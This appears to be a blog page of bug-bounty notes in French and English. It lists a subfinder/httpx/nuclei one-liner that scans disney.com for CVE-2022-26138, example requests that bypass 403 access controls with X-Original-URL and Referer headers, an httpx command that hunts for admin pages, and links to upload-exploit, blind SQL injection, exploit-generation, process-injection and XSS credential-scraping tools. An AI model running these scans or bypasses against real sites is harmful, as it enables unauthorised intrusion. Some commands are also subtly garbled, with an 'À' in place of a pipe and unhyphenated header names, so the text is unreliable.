Notes pour trouver des failles de sécurité

subfinder -d disney.com -silent -all À httpx -silent -threads 100 | nuclei -id CVE-2022-26138 -v

fuxploider : file upload vulnerability scanner and exploitation tool

—————————————

If you want to bypass endpoint always to use own methodology.

Example:

Http Header based bypass:

1. X Original URL: /redact

Example:

GET /api/getUser HTTP/1.1 -> 403
Host: redact.com

GET / HTTP/1.1
Host: redact.com
X Original URL: /api/getUser -> 200 OK

2. Referer: https://site.com/api/redact

Example:

GET /api/getUser HTTP/1.1 -> access denied
Host: redact.com

GET / HTTP/1.1
Host: redact.com
Referer: https://site.com/api/getUser —> 200 OK

or

GET /api/getUser HTTP/1.1
Host: redact.com
Referer: https://site.com/api/getUser -> 200 OK

—————————————–
expression régulière pour trouver des secrets
————————————–

Bug bounty platform
bugcrowd
hackerone
———————

Trouver des comptes administrateurs

cat domains_list.txt | httpx -ports 80,443,8080,8443 -paths “wordlist.txt” -mr “password”

https://raw.githubusercontent.com/the-robot/admin-finder/master/wordlist.txt

—————————-
Java Deserialization Cheat Sheet
https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
—————————

Automation Time-based Blind SQL injection on HTTP Headers using Blisqy tool
https://github.com/JohnTroony/Blisqy

——————————
Zeratool v2.2: Automatic Exploit Generation (AEG) with automated remote libc leaking and ret2dlresolve rop chain generation for exploitable CTF problems.
——————————
scraping login with xss

Scraping Login Credentials With XSS


—————————————————–

Dlinject – Inject A Shared Library (I.E. Arbitrary Code) Into A Live Linux Process, Without Ptrace
https://www.kitploit.com/2022/07/dlinject-inject-shared-library-ie.html?utm_source=dlvr.it&utm_medium=twitter
https://github.com/DavidBuchanan314/dlinject
—————————————
make url path combinations using a wordlist
https://github.com/trickest/mkpath
——————————–

Leave a Reply